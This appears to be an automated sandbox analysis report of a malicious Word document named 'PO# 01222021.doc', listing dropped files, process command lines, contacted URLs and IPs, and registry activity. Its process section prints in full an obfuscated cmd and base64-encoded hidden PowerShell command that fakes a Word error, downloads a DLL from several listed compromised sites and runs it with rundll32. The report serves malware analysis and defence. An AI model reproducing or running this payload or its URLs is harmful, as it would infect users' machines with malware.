Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
PO# 01222021.doc
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Steel Cambridgeshire
productivity orchestration Handmade Soft Gloves program Regional Gorgeous quantify payment RSS, Author: Camila Tirado, Template:
Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 22 16:11:00
2021, Last Saved Time/Date: Fri Jan 22 16:11:00 2021, Number of Pages: 1, Number of Words: 3367, Number of Characters: 19194,
Security: 8
|
initial sample
|
||
C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B6B610EC-9B88-4A7A-BAAD-75353DCC52EC}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D276006A-4137-4F1B-A238-F5A3AEDA2F09}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO# 01222021.LNK
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13
2020, mtime=Wed Aug 26 14:08:13 2020, atime=Wed Jan 27 02:55:34 2021, length=172032, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QEA56CXGKG1P2T41MR9D.temp
|
data
|
dropped
|
||
C:\Users\user\Desktop\~$# 01222021.doc
|
data
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
|
||
C:\Windows\System32\cmd.exe
|
cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc
IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACAAJwArACcAWwAgACcAKwAoACcAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACgAJwAvAGkAZQAtACcAKwAnAGIAJwArACcAZQAnACkAKwAoACcAcwAnACsAJwB0AC4AbgAnACkAKwAnAGUAJwArACgAJwB0AC8AbwAnACsAJwBuACcAKwAnAGwAaQBuACcAKQArACcAZQAnACsAKAAnAC0AJwArACcAdABpAG0AZQByACcAKwAnAC0AJwApACsAKAAnAGsAJwArACcAdgBoACcAKQArACgAJwB4AHoAJwArACcALwBpACcAKQArACcAbAAnACsAKAAnAFgAJwArACcATAAvACEAeAAnACkAKwAoACcAIABbACAAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACcALwAnACsAJwBnACcAKwAoACcAbwBjACcAKwAnAHAAJwArACcAaABvAG4AJwApACsAKAAnAGcAdABoACcAKwAnAGUAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwB3AHAAJwArACcALQAnACkAKwAnAGMAbwAnACsAJwBuAHQAJwArACgAJwBlAG4AdAAvACcAKwAnAGwAJwApACsAJwBNACcAKwAoACcATQBDACcAKwAnAC8AIQAnACkAKwAoACcAeAAgACcAKwAnAFsAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8ALwAnACsAJwB3AHcAJwApACsAJwB3ACcAKwAoACcALgBsACcAKwAnAGUAJwApACsAKAAnAHQAJwArACcAcwBjACcAKQArACcAbwBtACcAKwAnAHAAYQAnACsAKAAnAHIAJwArACcAZQBvAG4AJwApACsAKAAnAGwAJwArACcAaQBuACcAKQArACgAJwBlACcAKwAnAC4AYwAnACkAKwAoACcAbwBtAC8AZAAnACsAJwBlACcAKQArACgAJwAuAGwAJwArACcAZQB0ACcAKQArACcAcwBjACcAKwAnAG8AbQAnACsAJwBwACcAKwAnAGEAJwArACcAcgBlACcAKwAnAG8AbgAnACsAKAAnAGwAaQAnACsAJwBuAGUAJwApACsAKAAnAC4AJwArACcAYwBvAG0AJwArACcALwB3AFkAZAAvACcAKwAnACEAeAAgACcAKQArACcAWwAnACsAKAAnACAAcwAnACsAJwBoACAAYgAnACsAJwA6AC8AJwApACsAJwAvACcAKwAnAGMAYQAnACsAJwBtAGIAJwArACcAaQAnACsAKAAnAGEAcwB1AGgAJwArACcAaQAnACkAKwAoACcAcwB0AG8AcgAnACsAJwBpAGEAJwArACcALgBnAHIAbwB3ACcAKQArACcAbAAnACsAJwBhAGIAJwArACgAJwAuACcAKwAnAGUAcwAvAHcAcAAnACsAJwAtACcAKQArACcAYwBvACcAKwAnAG4AdAAnACsAJwBlAG4AJwArACcAdAAnACsAKAAnAC8AaAAnACsAJwBHAGgAWQAnACkAKwAnADIALwAnACkALgAiAHIAYABlAHAAYABMAEEAQwBlACIAKAAoACcAeAAgACcAKwAnAFsAJwArACgAJwAgAHMAaAAnACsAJwAgAGIAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAE0AcgBpAHEAZAA1ADkALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAcwBQAGwAYABpAHQAIgAoACQAQQA3ADYAQgAgACsAIAAkAEkAaAB2ADgAOQBfAGcAIAArACAAJABRADcAXwBSACkAOwAkAFYAOABfAEcAPQAoACgAJwBNACcAKwAnADUAMQAnACkAKwAnAFYAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABYAGoAOABzADEANQAxACAAaQBuACAAJABLAHcAMwA3ADkANAB4ACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAFkAUwB0AEUAbQAuAG4ARQBUAC4AdwBFAEIAQwBMAEkAZQBuAFQAKQAuACIAZABPAGAAdwBuAGAATABPAGEARABmAGkAbABlACIAKAAkAFgAagA4AHMAMQA1ADEALAAgACQAQQBkADEAcgBhADgAbgApADsAJABEADkANABKAD0AKAAnAEIAJwArACgAJwAzACcAKwAnADIARwAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABBAGQAMQByAGEAOABuACkALgAiAEwAYABFAG4AZwBgAFQASAAiACAALQBnAGUAIAAzADMAMQAyADAAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAMwAnACsAJwAyACcAKQAgACQAQQBkADEAcgBhADgAbgAsACgAJwBBACcAKwAnAG4AeQAnACsAKAAnAFMAdAByACcAKwAnAGkAJwApACsAJwBuAGcAJwApAC4AIgB0AE8AUwBUAFIAYABpAG4ARwAiACgAKQA7ACQAVgA3ADgAQgA9ACgAJwBTACcAKwAoACcAOAA1ACcAKwAnAEIAJwApACkAOwBiAHIAZQBhAGsAOwAkAFYAOABfAFAAPQAoACcARgA2ACcAKwAnADcATAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAMAA0AFYAPQAoACcASQAyACcAKwAnADYAWgAnACkA
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACAAJwArACcAWwAgACcAKwAoACcAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACgAJwAvAGkAZQAtACcAKwAnAGIAJwArACcAZQAnACkAKwAoACcAcwAnACsAJwB0AC4AbgAnACkAKwAnAGUAJwArACgAJwB0AC8AbwAnACsAJwBuACcAKwAnAGwAaQBuACcAKQArACcAZQAnACsAKAAnAC0AJwArACcAdABpAG0AZQByACcAKwAnAC0AJwApACsAKAAnAGsAJwArACcAdgBoACcAKQArACgAJwB4AHoAJwArACcALwBpACcAKQArACcAbAAnACsAKAAnAFgAJwArACcATAAvACEAeAAnACkAKwAoACcAIABbACAAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACcALwAnACsAJwBnACcAKwAoACcAbwBjACcAKwAnAHAAJwArACcAaABvAG4AJwApACsAKAAnAGcAdABoACcAKwAnAGUAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwB3AHAAJwArACcALQAnACkAKwAnAGMAbwAnACsAJwBuAHQAJwArACgAJwBlAG4AdAAvACcAKwAnAGwAJwApACsAJwBNACcAKwAoACcATQBDACcAKwAnAC8AIQAnACkAKwAoACcAeAAgACcAKwAnAFsAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8ALwAnACsAJwB3AHcAJwApACsAJwB3ACcAKwAoACcALgBsACcAKwAnAGUAJwApACsAKAAnAHQAJwArACcAcwBjACcAKQArACcAbwBtACcAKwAnAHAAYQAnACsAKAAnAHIAJwArACcAZQBvAG4AJwApACsAKAAnAGwAJwArACcAaQBuACcAKQArACgAJwBlACcAKwAnAC4AYwAnACkAKwAoACcAbwBtAC8AZAAnACsAJwBlACcAKQArACgAJwAuAGwAJwArACcAZQB0ACcAKQArACcAcwBjACcAKwAnAG8AbQAnACsAJwBwACcAKwAnAGEAJwArACcAcgBlACcAKwAnAG8AbgAnACsAKAAnAGwAaQAnACsAJwBuAGUAJwApACsAKAAnAC4AJwArACcAYwBvAG0AJwArACcALwB3AFkAZAAvACcAKwAnACEAeAAgACcAKQArACcAWwAnACsAKAAnACAAcwAnACsAJwBoACAAYgAnACsAJwA6AC8AJwApACsAJwAvACcAKwAnAGMAYQAnACsAJwBtAGIAJwArACcAaQAnACsAKAAnAGEAcwB1AGgAJwArACcAaQAnACkAKwAoACcAcwB0AG8AcgAnACsAJwBpAGEAJwArACcALgBnAHIAbwB3ACcAKQArACcAbAAnACsAJwBhAGIAJwArACgAJwAuACcAKwAnAGUAcwAvAHcAcAAnACsAJwAtACcAKQArACcAYwBvACcAKwAnAG4AdAAnACsAJwBlAG4AJwArACcAdAAnACsAKAAnAC8AaAAnACsAJwBHAGgAWQAnACkAKwAnADIALwAnACkALgAiAHIAYABlAHAAYABMAEEAQwBlACIAKAAoACcAeAAgACcAKwAnAFsAJwArACgAJwAgAHMAaAAnACsAJwAgAGIAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAE0AcgBpAHEAZAA1ADkALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAcwBQAGwAYABpAHQAIgAoACQAQQA3ADYAQgAgACsAIAAkAEkAaAB2ADgAOQBfAGcAIAArACAAJABRADcAXwBSACkAOwAkAFYAOABfAEcAPQAoACgAJwBNACcAKwAnADUAMQAnACkAKwAnAFYAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABYAGoAOABzADEANQAxACAAaQBuACAAJABLAHcAMwA3ADkANAB4ACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAFkAUwB0AEUAbQAuAG4ARQBUAC4AdwBFAEIAQwBMAEkAZQBuAFQAKQAuACIAZABPAGAAdwBuAGAATABPAGEARABmAGkAbABlACIAKAAkAFgAagA4AHMAMQA1ADEALAAgACQAQQBkADEAcgBhADgAbgApADsAJABEADkANABKAD0AKAAnAEIAJwArACgAJwAzACcAKwAnADIARwAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABBAGQAMQByAGEAOABuACkALgAiAEwAYABFAG4AZwBgAFQASAAiACAALQBnAGUAIAAzADMAMQAyADAAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAMwAnACsAJwAyACcAKQAgACQAQQBkADEAcgBhADgAbgAsACgAJwBBACcAKwAnAG4AeQAnACsAKAAnAFMAdAByACcAKwAnAGkAJwApACsAJwBuAGcAJwApAC4AIgB0AE8AUwBUAFIAYABpAG4ARwAiACgAKQA7ACQAVgA3ADgAQgA9ACgAJwBTACcAKwAoACcAOAA1ACcAKwAnAEIAJwApACkAOwBiAHIAZQBhAGsAOwAkAFYAOABfAFAAPQAoACcARgA2ACcAKwAnADcATAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAMAA0AFYAPQAoACcASQAyACcAKwAnADYAWgAnACkA
|
||
C:\Windows\System32\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
|
||
C:\Windows\SysWOW64\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',NRUAmATPeNJ
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca',VDZITWzoE
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpqpm\gwvn.lsl',KCoulWayDpJU
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpqpm\gwvn.lsl',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Upjyf\ffrm.rmq',iFoslrVsudBDI
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Upjyf\ffrm.rmq',#1
|
||
C:\Windows\System32\msg.exe
|
msg user /v Word experienced an error trying to open the file.
|
There are 5 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://cab.mykfn.com/admin/X/
|
103.143.46.51
|
||
http://gocphongthe.com/wp-content/lMMC/
|
unknown
|
||
http://ie-best.net/online-timer-kvhxz/ilXL/
|
unknown
|
||
http://www.letscompareonline.com/de.letscompareonline.com/wYd/
|
unknown
|
||
http://bhaktivrind.com/cgi-bin/JBbb8/
|
unknown
|
||
http://cab.mykfn.com
|
unknown
|
||
http://vanddnabhargave.com/asset/W9o/
|
unknown
|
||
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
|
unknown
|
||
http://www.windows.com/pctv.
|
unknown
|
||
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
|
unknown
|
||
http://investor.msn.com
|
unknown
|
||
http://www.msnbc.com/news/ticker.txt
|
unknown
|
||
http://www.icra.org/vocabulary/.
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
|
unknown
|
||
http://ocsp.sectigo.com0
|
unknown
|
||
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
|
unknown
|
||
http://investor.msn.com/
|
unknown
|
||
http://cambiasuhistoria.growlab.es/wp-content/hGhY2/
|
unknown
|
||
https://sectigo.com/CPS0D
|
unknown
|
||
http://www.%s.comPA
|
unknown
|
||
http://windowsmedia.com/redir/services.asp?WMPFriendly=true
|
unknown
|
||
http://www.hotmail.com/oe
|
unknown
|
There are 12 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
cab.mykfn.com
|
103.143.46.51
|
IPs
IP
|
Domain
|
Country
|
Active
|
Malicious
|
|
---|---|---|---|---|---|
195.159.28.230
|
unknown
|
Norway
|
unknown
|
||
69.38.130.14
|
unknown
|
United States
|
unknown
|
||
103.143.46.51
|
unknown
|
India
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
br4
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
{s4
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
2u4
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
VBAFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ReviewToken
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EC65B
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
